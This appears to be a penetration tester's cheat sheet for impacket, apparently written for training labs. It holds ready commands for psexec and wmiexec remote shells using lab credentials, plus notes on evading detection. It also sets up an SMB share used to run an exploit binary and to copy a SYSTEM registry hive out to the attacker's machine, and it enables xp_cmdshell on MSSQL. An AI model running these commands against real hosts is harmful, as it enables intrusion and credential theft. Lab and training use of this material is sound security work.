Skip to content

impacket

Installation

git clone https://github.com/SecureAuthCorp/impacket.git /opt/tools/impacket
cd /opt/tools/impacket/ 
python3 -m pip install .
pip3 install -r requirements.txt
#pip3 install .
#python3 setup.py install
# pip3 install --upgrade pip

psexec.py

Psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host. It then registers the service via RPC and the Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as SYSTEM on the victim host.

/opt/tools/impacket/examples/psexec.py $DOMAIN/$USER:$PASS@$IP
# /opt/tools/impacket/examples/psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125

wmiexec.py

Wmiexec.py utilizes a semi-interactive shell where commands are executed through Windows Management Instrumentation. It does not drop any files or executables on the target host and generates fewer logs than other modules. After connecting, it runs as the local admin user we connected with (this can be less obvious to someone hunting for an intrusion than seeing SYSTEM executing many commands). This is a more stealthy approach to execution on hosts than other tools, but would still likely be caught by most modern anti-virus and EDR systems. We will use the same account as with psexec.py to access the host.

/opt/tools/impacket/examples/wmiexec.py $DOMAIN/$USER:$PASS@$IP
# wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5

smbserver.py - Samba local server

Setup SMB Server - Kali 

mkdir share
/opt/impacket/examples/smbserver.py -smb2support public share

/opt/tools/impacket/examples/smbserver.py public .
/opt/tools/impacket/examples/smbserver.py -smb2support public .
in case of error on client side You can't access this shared folder because your organization's security policy block unauthenticated guest access 
/opt/tools/impacket/examples/smbserver.py -smb2support -username $USER -password $PASS public .
# /opt/tools/impacket/examples/smbserver.py -smb2support -username 'thm' -password 'Passw0rd!' public .
# /opt/tools/impacket/examples/smbserver.py -smb2support -username 'htb-student' -password 'Academy_student_AD!' public .
execute binary on windows shared via smb 
//<KALI_IP>/public/ms11-046.exe
//<KALI_IP>/public/accesschk.exe -uwdq "C:\Program Files\Unquoted Path Service\"
copy file from windows to kali 
copy C:\Users\admin\Desktop\system.hive \\<KALI_IP>\public\
copy file from kali to windows 
copy \\<KALI_IP>\public\accesschk.exe C:\admin\Desktop\accesschk.exe

mssqlclient.py

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
SQL> help
SQL> enable_xp_cmdshell
xp_cmdshell whoami /priv